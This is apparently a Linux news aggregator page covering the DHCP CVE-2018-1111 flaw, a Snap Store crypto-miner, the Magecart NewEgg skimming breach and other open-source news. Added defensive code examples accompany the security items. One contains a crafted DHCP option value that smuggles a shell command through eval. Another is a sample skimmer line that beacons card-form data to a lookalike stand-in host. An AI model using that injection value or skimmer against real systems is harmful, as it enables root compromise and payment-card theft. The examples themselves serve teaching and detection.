
Security: DHCP, System Updates, and Ubuntu Blobs Store

Filed under
Security
  • Protect your Fedora system against this DHCP flaw

    A critical security vulnerability was discovered and disclosed earlier today in dhcp-client. This DHCP flaw carries a high risk to your system and data, especially if you use untrusted networks such as a WiFi access point you don’t own. Read more here for how to protect your Fedora system.

    Dynamic Host Configuration Protocol (DHCP) allows your system to get configuration from a network it joins. Your system makes a request for DHCP data, and typically a server such as a router answers. The server provides the data your system needs to configure itself. This is how, for instance, your system configures itself properly for networking when it joins a wireless network.

    However, an attacker on the local network may be able to exploit this vulnerability. Using a flaw in a dhcp-client script that runs under NetworkManager, the attacker may be able to run arbitrary commands with root privileges on your system. This DHCP flaw puts your system and your data at high risk. The flaw has been assigned CVE-2018-1111 and has a Bugzilla tracking bug.

  • Security updates for Tuesday
  • Potentially Malicious Bytecoin Miner Removed from the Ubuntu Snap Store
  • Canonical on trust and security in the Snap Store

    Here's a posting from Canonical concerning the cryptocurrency-mining app that was discovered in its Snap Store.

  • Canonical finds hidden crypto-miners in the Linux Snap app store

    Last Friday, Canonical, the developer of the popular Ubuntu operating system and owner of the Snapcraft app store, spotted one application surreptitiously mining cryptocurrencies in the background.
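The DHCP item above describes a dhcp-client hook that lets whichever DHCP server answers on the local network run commands as root. The script below is an added example, not the Fedora or NetworkManager dispatcher script and not the published fix: it reproduces the bug class, untrusted DHCP option values turned into shell source with `eval`, through a hypothetical `unsafe_import`/`safe_import` pair and a constructed option value, so the two patterns can be contrasted offline. The function names, the option value and the variable name `DHCP4_ROUTER` are assumptions for the illustration.

```shell
#!/bin/sh
# Added example, not the Fedora/NetworkManager dispatcher script itself.
# A DHCP client hook that rebuilds shell variables from option values with
# `eval` lets any DHCP server on the LAN supply shell code, and the hook
# runs as root.

# Constructed value a rogue DHCP server could return for an option. The
# quote closes the assignment the vulnerable hook builds; the rest runs.
MALICIOUS_OPT="192.0.2.1'; INJECTED=1; echo 'x"

# Vulnerable pattern (hypothetical): untrusted data becomes shell source.
unsafe_import() {   # unsafe_import NAME VALUE
    eval "$1='$2'"
}

# Hardened pattern: the value never becomes shell source. The name is
# checked against a strict identifier whitelist and the value is handed to
# a builtin as one argument, so quotes and semicolons inside it are inert.
safe_import() {     # safe_import NAME VALUE ; returns 1 for a bad name
    case "$1" in
        ""|[0-9]*|*[!A-Za-z0-9_]*) return 1 ;;
    esac
    export "$1=$2"
}

# Feed the attacker's option through each pattern and report whether the
# injected assignment executed (1 means the payload ran).
injected_after_unsafe() {
    INJECTED=0
    unsafe_import DHCP4_ROUTER "$MALICIOUS_OPT" >/dev/null
    echo "$INJECTED"
}

injected_after_safe() {
    INJECTED=0
    safe_import DHCP4_ROUTER "$MALICIOUS_OPT"
    echo "$INJECTED"
}

# What the hardened import actually stored: the option text, verbatim.
stored_after_safe() {
    safe_import DHCP4_ROUTER "$MALICIOUS_OPT"
    printf '%s\n' "$DHCP4_ROUTER"
}

echo "unsafe: INJECTED=$(injected_after_unsafe)"   # 1
echo "safe:   INJECTED=$(injected_after_safe)"     # 0
```

The remedy the advisory points to is the updated dhcp-client package; the example only shows why any script that interpolates network-supplied strings into `eval` needs the same treatment, and why staying off untrusted networks until the update is applied is the right interim measure.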

FSFE Resignation and Parabola GNU/Linux-libre Needs Hardware

  • Daniel Pocock: Resigning as the FSFE Fellowship's representative
    I've recently sent the following email to fellows, I'm posting it here for the benefit of the wider community and also for any fellows who don't receive the email.
  • Parabola GNU/Linux-libre: Server loss
    However, that sponsorship has come to an end. We are alright for now; the server that 1984 Hosting is sponsoring us with is capable of covering our immediate needs. We are looking for a replacement server and are favoring a proprietor that is a "friend of freedom," if anyone in the community has a suggestion.

Red Hat: News and Financial Results

KDE and GNOME: Krita, Bionic and AppStream/AppData

  • Let’s Tally Some Votes!
    We’re about a week into the campaign, and almost 9000 euros along the path to bug fixing. So we decided to do some preliminary vote tallying! And share the results with you all, of course! On top is Papercuts, with 84 votes. Is that because it’s the default choice? Or because you are telling us that Krita is fine, it just needs to be that little bit smoother that makes all the difference? If the latter, we won’t disagree, and yesterday Boudewijn fixed one of the things that must have annoyed everyone who wanted to create a custom image: now the channel depths are finally shown in a logical order!
  • Almost Bionic
    Maybe it’s all the QA we added but issues kept cropping up with Bionic. All those people who had encrypted home folders in xenial soon found they had no files in bionic because support had been dropped so we had to add a quirk to keep access to the files. Even yesterday a badly applied patch to the installer broke installs on already partitioned disks which it turns out we didn’t do QA for so we had to rejig our tests as well as fix the problem. Things are turning pleasingly green now so we should be ready to launch our Bionic update early next week. Do give the ISO images one last test and help us out by upgrading any existing installs and reporting back. Hasta pronto.
  • Speeding up AppStream: mmap’ing XML using libxmlb
    AppStream and the related AppData are XML formats that have been adopted by thousands of upstream projects and are being used in about a dozen different client programs. The AppStream metadata shipped in Fedora is currently a huge 13 MB XML file, which with gzip compresses down to a more reasonable 3.6 MB. AppStream is awesome; it provides translations of lots of useful data into basically all languages and includes screenshots for almost everything. GNOME Software is built around AppStream, and we even use a slightly extended version of the same XML format to ship firmware update metadata from the LVFS to fwupd.

Security: Updates, NewEgg Breach, "Master Password" and CLIP OS

  • Security updates for Thursday
  • NewEgg cracked in breach, hosted card-stealing code within its own checkout

    The popular computer and electronics Web retailer NewEgg has apparently been hit by the same payment-data-stealing attackers who targeted TicketMaster UK and British Airways. The attackers, referred to by researchers as Magecart, managed to inject 15 lines of JavaScript into NewEgg's webstore checkout that forwarded credit card and other data to a server with a domain name that made it look like part of NewEgg's Web infrastructure. It appears that all Web transactions over the past month were affected by the breach.

  • "Master Password" Is A Password Manager Alternative That Doesn't Store Passwords
    Master Password is a different way of using passwords. Instead of the "know one password, save all others somewhere" way of managing passwords used by regular password managers, Master Password's approach is "know one password, generate all the others".
  • French cyber-security agency open-sources CLIP OS, a security hardened OS
    The National Cybersecurity Agency of France, also known as ANSSI (Agence Nationale de la Sécurité des Systèmes d'Information), has open-sourced CLIP OS, an in-house operating system its engineers had developed to address the needs of the French government administration. In a press release, ANSSI described CLIP OS as a "Linux-based operating system [that] incorporates a set of security mechanisms that give it a very high level of resistance to malicious code and allow it to protect sensitive information."
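The NewEgg item above describes the Magecart pattern: a few lines of JavaScript injected into the checkout page that forward card data to a domain chosen to look first-party. The script below is an added example, not Newegg's code and not the skimmer: an offline audit that lists every host a checkout page loads scripts from or sends data to, flags hosts outside the merchant's allow-list, marks the ones borrowing the brand name as lookalikes, and emits the Content-Security-Policy that would have confined outbound requests to first-party origins. The sample page, the hostnames and the allow-list are constructed for the illustration.

```javascript
// Added example (not Newegg's code and not the skimmer itself): audit a
// checkout page for the two things a skimmer needs, a script from or a
// request to a host the merchant does not control. Constructed input.
const SAMPLE_CHECKOUT_HTML = `
<html><body>
<script src="https://www.newegg.example/js/checkout.js"></script>
<script src="https://cdn.newegg.example/js/ui.js"></script>
<script>
  // injected skimmer: serialize the card form on submit and ship it off
  document.getElementById('checkout').addEventListener('submit', function () {
    navigator.sendBeacon('https://newegg-stats.example/collect', new FormData(this));
  });
</script>
<form id="checkout" action="/checkout/submit"></form>
</body></html>`;

// Hosts the merchant actually operates (assumed for the example).
const FIRST_PARTY_HOSTS = ['www.newegg.example', 'cdn.newegg.example'];
// Brand token used to flag lookalike domains.
const BRAND = 'newegg';

// Every host named by a <script src> or by an http(s) URL literal inside an
// inline script body. Regex based so it runs without a DOM.
function referencedHosts(html) {
  const hosts = new Set();
  const srcRe = /<script\b[^>]*\ssrc=["']([^"']+)["']/gi;
  const inlineRe = /<script\b(?![^>]*\ssrc=)[^>]*>([\s\S]*?)<\/script>/gi;
  const urlRe = /https?:\/\/[^\s"'<>()]+/g;
  let m;
  while ((m = srcRe.exec(html)) !== null) hosts.add(new URL(m[1]).host);
  while ((m = inlineRe.exec(html)) !== null) {
    for (const u of m[1].match(urlRe) || []) hosts.add(new URL(u).host);
  }
  return [...hosts];
}

// Hosts outside the allow-list; a host that borrows the brand name is the
// trick the article describes, so it is marked as a lookalike.
function auditCheckout(html, allowlist, brand) {
  return referencedHosts(html)
    .filter(h => !allowlist.includes(h))
    .map(h => ({ host: h, lookalike: h.includes(brand) }));
}

// A Content-Security-Policy for the checkout page that blocks the
// exfiltration even with the script already on the page: scripts,
// connections (fetch, XHR, sendBeacon) and form posts are confined to
// first-party origins.
function checkoutCsp(allowlist) {
  const origins = allowlist.map(h => `https://${h}`).join(' ');
  return [
    "default-src 'self'",
    `script-src 'self' ${origins}`,
    `connect-src 'self' ${origins}`,
    "form-action 'self'",
    "object-src 'none'",
  ].join('; ');
}

console.log(auditCheckout(SAMPLE_CHECKOUT_HTML, FIRST_PARTY_HOSTS, BRAND));
console.log(checkoutCsp(FIRST_PARTY_HOSTS));
```

The policy is defence in depth rather than a cure: an attacker who can edit the checkout template on the merchant's own server may be able to edit response headers as well, so the audit above (or the equivalent in a browser-side monitor) is the detection half, and the CSP is the containment half.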
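The Master Password item above describes the stateless approach: one remembered secret, every site password derived from it on demand, nothing stored. The Python below is an added example of that approach, not the Master Password project's algorithm, templates or constants: it derives a slow, salted master key from the user name and master password, a cheap per-site key from that plus a counter, and renders the site key through a character-class template. The namespace string `SCOPE`, the scrypt parameters, the character classes and the template are assumptions made for the illustration.

```python
import hashlib
import hmac

# Namespace string and parameters are assumptions for this example, not the
# Master Password project's constants.
SCOPE = b"example.stateless.password"

# Character classes addressed by one template letter each (assumed).
CLASSES = {
    "C": "BCDFGHJKLMNPQRSTVWXYZ",    # upper consonant
    "c": "bcdfghjklmnpqrstvwxyz",    # lower consonant
    "V": "AEIOU",                    # upper vowel
    "v": "aeiou",                    # lower vowel
    "n": "0123456789",               # digit
    "o": "@&%?,=[]_:-+*$#!'^~;()/.", # symbol
}
TEMPLATE = "CvcvnoCvcvCvcv"   # 14 chars: pronounceable, one digit, one symbol


def master_key(user_name: str, master_password: str) -> bytes:
    """Slow, salted derivation of the one secret everything hangs off.
    The user name is the salt: it is public, but it stops two users with the
    same master password from sharing site passwords."""
    salt = SCOPE + len(user_name).to_bytes(4, "big") + user_name.encode()
    return hashlib.scrypt(master_password.encode(), salt=salt,
                          n=2**15, r=8, p=2, dklen=64, maxmem=2**26)


def site_key(mkey: bytes, site: str, counter: int) -> bytes:
    """Cheap per-site derivation. The counter is the only way to rotate a
    site password in a stateless scheme: bump it and a new one falls out."""
    msg = (SCOPE + len(site).to_bytes(4, "big") + site.encode()
           + counter.to_bytes(4, "big"))
    return hmac.new(mkey, msg, hashlib.sha256).digest()


def render(key: bytes, template: str = TEMPLATE) -> str:
    """Map the 256-bit site key onto the template. Treating the key as one
    integer and peeling off one class index at a time leaves a bias that is
    negligible because 2**256 dwarfs the number of possible outputs."""
    n = int.from_bytes(key, "big")
    out = []
    for cls in template:
        n, idx = divmod(n, len(CLASSES[cls]))
        out.append(CLASSES[cls][idx])
    return "".join(out)


def site_password(user_name: str, master_password: str, site: str,
                  counter: int = 1, template: str = TEMPLATE) -> str:
    """The whole scheme: nothing is stored, the same inputs always give the
    same password, and a leaked site password reveals neither the master
    key nor any other site password (HMAC is one-way in its key)."""
    return render(site_key(master_key(user_name, master_password),
                           site, counter), template)


if __name__ == "__main__":
    print(site_password("alice", "correct horse battery staple", "example.com"))
    print(site_password("alice", "correct horse battery staple",
                        "example.com", counter=2))
```

The caveats a practitioner should weigh before adopting any derive-only scheme follow from the code: the user name is not secret, so the master password carries the entire security and cannot be changed for one site without changing all of them; a site that imposes its own password, forces a reset, or rejects the template's character set can only be handled by remembering a counter or a template choice somewhere, so "stores nothing" tends to become "stores a little"; and a leaked master password compromises every site at once with no server-side record to revoke.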